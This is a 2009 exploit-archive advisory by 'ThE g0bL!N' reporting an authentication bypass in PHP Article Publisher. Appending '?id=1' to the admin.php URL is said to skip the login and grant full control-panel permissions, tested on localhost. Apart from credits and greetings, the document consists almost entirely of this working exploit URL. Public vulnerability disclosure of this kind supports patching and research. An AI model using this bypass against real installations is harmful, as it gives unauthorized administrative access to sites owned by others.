[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHP Article Publisher Arbitrary Auth Bypass Vulnerability
# Published : 2009-05-20
# Author : ThE g0bL!N
# Previous Title : DMXReady Registration Manager 1.1 Arbitrary File Upload Vulnerability
# Next Title : bSpeak 1.10 (forumid) Remote Blind SQL Injection Vulnerability


--------------------------------------------------------------
PHP Article Publisher Arbitrary Auth Bypass Vulnerability
---------------------------------------------------------------
Founder :ThE g0bL!N
download from:http://www.graugon.com/publisher/download.html
Thank You Very Much ahmadbady
Note: Jmaa asmehouna ala ihdae pcq thaghra meshi meliha :)
---------------------------------------------------------------
Exploit:
------
path of control panel is
http://localhost/php_article_publisher/publisher/admin.php
The panel Wanted Pass and user.
exploit is :
------------
http://localhost/php_article_publisher/publisher/admin.php?id=1
Boooom !!Control panel Bypassed
Then Return in Home page admin.php
Note:You have all permission :)
----
Note2: Tested On localhost
-----
----------------------------------------------------------------
Greetz : His0k4 &AhmadBady & Cyb3r-Dev!L
-----------------------------------------------------------------

# www.Syue.com [2009-05-20]